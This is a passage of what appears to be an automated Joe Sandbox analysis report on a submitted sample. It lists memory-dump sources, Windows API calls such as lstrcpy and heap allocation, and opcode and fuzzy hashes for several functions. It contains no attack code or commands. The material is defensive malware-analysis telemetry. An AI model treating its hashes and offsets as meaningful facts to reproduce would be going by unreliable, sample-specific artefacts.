                              • Part of subcall function 008F7E80: std::_Xinvalid_argument.LIBCPMT ref: 008F7ED1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: string too long
                            • API String ID: 909987262-2556327735
                            • Opcode ID: e54f875e8a323f4ecad06f503fe11e038f22b58de743769f8de75ceaf8d6bce0
                            • Instruction ID: ddc2f19a61678de034f0b0ef647764fdf5600f94f3032173e32fc74f2b197798
                            • Opcode Fuzzy Hash: e54f875e8a323f4ecad06f503fe11e038f22b58de743769f8de75ceaf8d6bce0
                            • Instruction Fuzzy Hash: 3231D6723086188BF724AD7CE88097AF7E9FF91B647604A2BF241CB685D7719C4083E5
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 008E6F74
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008E6F7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID: @
                            • API String ID: 1357844191-2766056989
                            • Opcode ID: 2e7e4b90020bbf71b5426f5096a6522822dd81527ba9a7304aab30f11bd9a373
                            • Instruction ID: 33865249752ea42088325e2dc0a30f13bfd9a466be26a12c868cd486ad1eb5c9
                            • Opcode Fuzzy Hash: 2e7e4b90020bbf71b5426f5096a6522822dd81527ba9a7304aab30f11bd9a373
                            • Instruction Fuzzy Hash: 3721ACB06007419BEB208B62DC84BB673E8FB52744F848868F946CBA80FB74E945C755
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 0090261C
                            • lstrlen.KERNEL32(00000000), ref: 009026B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00902740
                            • lstrlen.KERNEL32(00000000), ref: 00902747
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 4e867a2ae9cd1d52ef63c9a6c738c222a8344019cc6e1c1724c65dd8eef480dc
                            • Instruction ID: 7bfcd382a81ce6423c133b8050bb7b3fb39aa497e9f0d423a4a1bc866c88194c
                            • Opcode Fuzzy Hash: 4e867a2ae9cd1d52ef63c9a6c738c222a8344019cc6e1c1724c65dd8eef480dc
                            • Instruction Fuzzy Hash: AE81B1B1E0020A9FDB14DB94DC48BAEB7B9FF94300F248069E904A73C1EB759D45CB95
                            APIs
                              • Part of subcall function 008E1610: lstrcpy.KERNEL32(00000000), ref: 008E162D
                              • Part of subcall function 008E1610: lstrcpy.KERNEL32(00000000,?), ref: 008E164F
                              • Part of subcall function 008E1610: lstrcpy.KERNEL32(00000000,?), ref: 008E1671
                              • Part of subcall function 008E1610: lstrcpy.KERNEL32(00000000,?), ref: 008E1693
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: af304a9f09cf0485b3bc3276647328deb5b7019392f3c51aa62ea9ef2cabca66
                            • Instruction ID: a248d5e569a95a39877a289472bd54e1e0e91fd9e25e07e0786a857efac4b1eb
                            • Opcode Fuzzy Hash: af304a9f09cf0485b3bc3276647328deb5b7019392f3c51aa62ea9ef2cabca66
                            • Instruction Fuzzy Hash: 0B31E874A01B82AFCB24DF3AC598956BBF5FF4A704740492DA896C3B10DB70F861CB80
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00901771
                            • lstrcpy.KERNEL32(00000000,?), ref: 009017A9
                            • lstrcpy.KERNEL32(00000000,?), ref: 009017E1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00901819
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: dc13919defd4e78136c022ceb48ff741fef4b50f931463257867997493ae65e4
                            • Instruction ID: 6ab346667cea289acf79bb03d3faa08f3fbc2d6cf5e6a910b3ef98dabba1891f
                            • Opcode Fuzzy Hash: dc13919defd4e78136c022ceb48ff741fef4b50f931463257867997493ae65e4
                            • Instruction Fuzzy Hash: 8C21D774601B429FD728EF7AD858A17B7ECFF45700B048A2CE886C7A81DB70E851CB91
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 008E162D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E164F
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1671
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1693
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: e10d65a047e388270b272341a26f6c06a34ea26a2e153d0757b0739908df9efc
                            • Instruction ID: e27ef4953b76bdba96803c3b4fd8582bb4e195f374481cc58ba396b3c12f7bb4
                            • Opcode Fuzzy Hash: e10d65a047e388270b272341a26f6c06a34ea26a2e153d0757b0739908df9efc
                            • Instruction Fuzzy Hash: 3A1151B4A11782ABCB24AF3BD41C926B7FCFF56701748492DA886C3A50EB30E851CB50